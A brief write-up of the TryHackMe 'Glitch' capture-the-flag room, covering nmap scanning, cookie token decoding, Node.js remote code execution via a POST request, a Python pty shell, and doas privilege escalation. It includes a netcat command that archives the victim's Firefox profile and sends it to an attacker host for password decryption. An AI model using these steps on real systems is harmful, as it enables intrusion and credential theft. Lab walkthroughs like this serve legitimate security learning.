Tryhackme GLITCH Writeup

Yeah start with nmap scanning.

Command: nmap -vv -sCV 10.10.15.163

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack nginx 1.14.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: not allowed
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only the http port is open. Let’s take a look source code.

We open the console and send the “getAccess ()” parameter.

Yes it is base64 encrypted. With the token, we change cookies and enter the system.

Command: echo 'd*************************==' |base64 -d

t***_**_****_***l

Tryhackme also gives us the hint “What other methods does the API accept?” We catch the request with burp and see that it sends the request with the GET method, then when we edit it as a POST request.

Node.js RCE and a simple reverse shell -CTF

Yes, we can RCE now that we have found the parameter.

We spawn pty with Python and export xterm.

Command: python -c 'import pty;pty.spawn(''/bin/bash'')' && export TERM=xterm

And get ready user.txt

THM{i**************y}

unode/firefox_decrypt

Command: tar -cfz a.tar .firefox/

Victim Box
nc 10.9.45.10 1234 < a.tar
---------------------------
Atacker 
nc -lvp 1234 > a.tar 

https://github.com/slicer69/doas

Command: doas -u root bash

Thank you for reading and solving